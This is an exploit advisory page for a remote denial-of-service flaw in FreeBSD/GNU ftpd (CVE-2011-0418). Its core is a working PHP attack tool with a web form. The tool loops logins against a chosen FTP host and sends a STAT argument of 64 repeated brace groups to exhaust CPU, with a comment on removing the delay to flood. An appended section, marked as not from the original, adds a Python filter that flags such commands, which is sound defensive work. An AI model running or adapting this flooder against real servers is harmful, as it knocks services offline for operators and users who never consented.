FreeBSD/GNU ftpd remote denial of service exploit


Published / (Updated): 2013-01-31 / 2013-02-01
Credit: DevilTeam
Risk: Medium
CWE: CWE-399
CVE: CVE-2011-0418
Local: No
Remote: Yes

CVSS Base Score: 4/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

<?php
//PoC by Kacper R. from devilteam.pl
//Bug found by: Maksymilian ( cxsec.org )

set_time_limit(0);
if(isset($_GET['runit'])){
flush();
while(1){
$fp = fsockopen($_GET['host'], $_GET['port'], $errno, $errstr, 5);
fread($fp,1024);
fwrite($fp, "USER ".$_GET['user']."\r\n"); fread($fp,1024);
fwrite($fp, "PASS ".$_GET['pass']."\r\n"); fread($fp,1024);
fwrite($fp, "STAT ".str_repeat(chr(123).chr(97).chr(44).chr(98).chr(125),64)."\r\n");
fclose($fp);
time_nanosleep(0,300000000);//delete to flood
flush();
}
}
if(!isset($_GET['host'])) $_GET['host']='localhost'; if(!isset($_GET['port'])) $_GET['port']='21';
if(!isset($_GET['user'])) $_GET['user']='anonymous'; if(!isset($_GET['pass'])) $_GET['pass']='anonymous';
echo '<html><head><title>FreeBSD 9.1 ftpd Remote Denial of
Service</title></head><body>
<h1>FreeBSD 9.1 ftpd Remote Denial of Service</h1><P><form action=""
method="GET">
<PRE>
Host: <input type="text" name="host" value="'.$_GET['host'].'">
Port: <input type="text" name="port" value="'.$_GET['port'].'">
User: <input type="text" name="user" value="'.$_GET['user'].'">
Pass: <input type="text" name="pass" value="'.$_GET['pass'].'">
</PRE>
</p>';
if(isset($_GET['confirm'])){
echo '<input type="submit" value="!!!!!!Confirm !!!!!! And click this again when stop"
name="runit">';
echo '<p><br /><a href="https://devilteam.pl/"><img
src="https://devilteam.pl/images/dt2.gif"></a><a
href="http://cxsecurity.com/"><img src="http://cxsec.com/images/wlb/cxsecbannersmal.png"
width="100" hight="40"></a>';
} else{
echo '<input type="submit" value="Create ftpd process 100% CPU" name="confirm">';
echo '<p><br /><a href="https://devilteam.pl/"><img
src="https://devilteam.pl/images/dt.gif"></a><a href="http://cxsecurity.com/"
><img src="http://cxsec.com/images/wlb/cxsecbanersmal.png" width="100"
hight="40"></a>';
}
echo '
</form>
</body>
</html>';
?>
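
Added example, not part of the original advisory or the PoC author's code: the STAT argument in the PoC is `{a,b}` repeated 64 times, which brace expansion would turn into 2^64 candidate names. The Python code below counts the expansions of a pattern without performing them, so a proxy or log filter can flag such commands before they reach the server; the command set, the threshold and the sample lines are assumptions constructed for illustration.

```python
"""Count brace-expansion results without expanding them; flag costly FTP arguments."""

GLOB_COMMANDS = {"STAT", "LIST", "NLST"}  # assumption: verbs whose argument is globbed
MAX_EXPANSIONS = 1024                     # assumption: local policy threshold


def brace_expansions(pattern):
    """Return how many strings csh-style brace expansion would produce."""
    # Each frame is [sum of finished alternatives, product of the current one].
    stack = [[0, 1]]
    for ch in pattern:
        if ch == "{":
            stack.append([0, 1])
        elif ch == "," and len(stack) > 1:      # a top-level comma is literal
            stack[-1][0] += stack[-1][1]
            stack[-1][1] = 1
        elif ch == "}" and len(stack) > 1:
            done, current = stack.pop()
            stack[-1][1] *= done + current      # alternatives add, neighbours multiply
    while len(stack) > 1:                       # unterminated group: count as if closed
        done, current = stack.pop()
        stack[-1][1] *= done + current
    return stack[0][1]


def flag_command(line, limit=MAX_EXPANSIONS):
    """Return (verb, expansions) when a globbing command exceeds limit, else None."""
    verb, _, arg = line.rstrip("\r\n").partition(" ")
    verb = verb.upper()
    if verb not in GLOB_COMMANDS:
        return None
    count = brace_expansions(arg)
    return (verb, count) if count > limit else None


# Constructed sample control-channel lines (not captured traffic).
SAMPLE = [
    "USER anonymous\r\n",
    "STAT /pub/{readme,index}.txt\r\n",
    "STAT " + "{a,b}" * 64 + "\r\n",
]


def scan(lines, limit=MAX_EXPANSIONS):
    return [hit for hit in (flag_command(l, limit) for l in lines) if hit]


if __name__ == "__main__":
    for verb, count in scan(SAMPLE):
        print(f"flag {verb}: {count} expansions")
```

Because the count is computed arithmetically, the check stays linear in the length of the command line even when the expansion itself would be exponential.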

References:

https://devilteam.pl
http://cxsecurity.com/issue/WLB-2013020003

Copyright 2014, cxsecurity.com